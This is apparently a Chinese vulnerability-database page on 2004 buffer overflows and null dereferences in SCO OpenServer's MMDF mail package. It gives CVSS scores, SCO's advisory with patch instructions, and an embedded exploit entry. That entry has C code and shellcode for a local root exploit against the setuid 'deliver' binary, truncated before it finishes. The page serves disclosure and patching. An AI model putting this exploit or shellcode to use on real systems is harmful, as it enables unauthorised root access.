发布时间 :2004-12-23 00:00:00
修订时间 :2008-09-05 16:38:36

[原文]Multiple unknown vulnerabilities in MMDF on OpenServer 5.0.6 and 5.0.7, and possibly other operating systems, may allow attackers to cause a denial of service by triggering a null dereference.

[CNNVD]OpenServer MMDF多个缓冲区溢出漏洞(CNNVD-200412-090)

        另外MMDF存在NULL指针废弃和Core Dump问题,可导致应用程序崩溃,

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  XF  openserver-mmdf-name-dos(16739)

- 漏洞信息

OpenServer MMDF多个缓冲区溢出漏洞
低危 边界条件错误
2004-12-23 00:00:00 2005-10-20 00:00:00
        另外MMDF存在NULL指针废弃和Core Dump问题,可导致应用程序崩溃,

- 公告与补丁

        OpenServer 5.0.7
         4.1 Location of Fixed Binaries
         SCO OpenServer Release 5.0.7 Maintenance Pack 3及之后版本也包含此补丁:

        OpenServer 5.0.6
         5.1 Location of Fixed Binaries

- 漏洞信息 (24293)

SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities (EDBID:24293)
sco local
2004-07-20 Verified
0 Ramon Valle
N/A [点击下载]

It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input.

These issues are known to be exploitable locally, however due to the nature of the application it is likely that remote exploitation is possible as well, although this is not confirmed.

An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users.

 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle

char shellcode[]=           /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68""/ksh"            /*  pushl   $0x68736b2f               */
    "\x68""/bin"            /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];



- 漏洞信息 (F33830)

SCOSA-2004.7.txt (PacketStormID:F33830)
2004-07-20 00:00:00

SCO Security Advisory - Multiple vulnerabilities have been found in the MMDF binaries included with SCO Openserver versions 5.0.6 and 5.0.7. These include buffer overflows, null dereferences, and core dumps.

Hash: SHA1


			SCO Security Advisory

Subject:		OpenServer 5.0.6 OpenServer 5.0.7 : MMDF Various buffer overflows and other security issues
Advisory number: 	SCOSA-2004.7
Issue date: 		2004 July 14
Cross reference: 	sr884728 fz528322 erg712434 CAN-2004-0510 CAN-2004-0511 CAN-2004-0512

1. Problem Description

	Deprotect discovered a buffer overflow in execmail.  After reviewing 
	our code we determined the whole MMDF package needed a security audit.

	Various buffer overflows and other security issues that affect all 
	MMDF binaries have been corrected. 

	All but one of the MMDF binaries that were setuid root are no 
	longer setuid. 

	Additional changes in this version of MMDF are documented at
	and in the updated man pages which are included in SCOSA-2004.7

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF buffer overflows the name CAN-2004-0510.

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF null dereferences the name CAN-2004-0511.

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF core dumps the name CAN-2004-0512.

2. Vulnerable Supported Versions

	System			Binaries
	OpenServer 5.0.6 	MMDF Distribution
	OpenServer 5.0.7 	MMDF Distribution

3. Solution

	The proper solution is to install the latest packages.

4. OpenServer 5.0.7

	4.1 Location of Fixed Binaries

	The fixes are also available in SCO OpenServer Release 5.0.7 
	Maintenance Pack 3 or later.  See

5. OpenServer 5.0.6   

	5.1 Location of Fixed Binaries

	5.2 Verification

	MD5 (VOL.000.000) = 7d079342022ff408e479184fab3ee86b

	md5 is available for download from

	5.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the download directory as the location of
	the images.

6. References

	Specific references for this advisory:

	SCO security resources:

	SCO security advisories via email

	This security fix closes SCO incidents sr884728 fz528322

7. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO

8. Acknowledgments

	SCO would like to thank Deprotect which describes itself 
	as "a Swedish based security company divided into four 
	divisions; Managed Security Services, Security Services, 
	Products and Development and our Security Academy."


Version: GnuPG v1.2.4 (SCO/UNIX_SVR5)


- 漏洞信息

SCO OpenServer MMDF Null Dereferences DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Unknown

- 漏洞描述

OpenServer contains a flaw that may allow a remote denial of service. The issue is triggered when an unspecified null dereference occurs in the MMDF package, and will result in loss of availability for the service. No further details have been provided.

- 时间线

2004-07-14 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete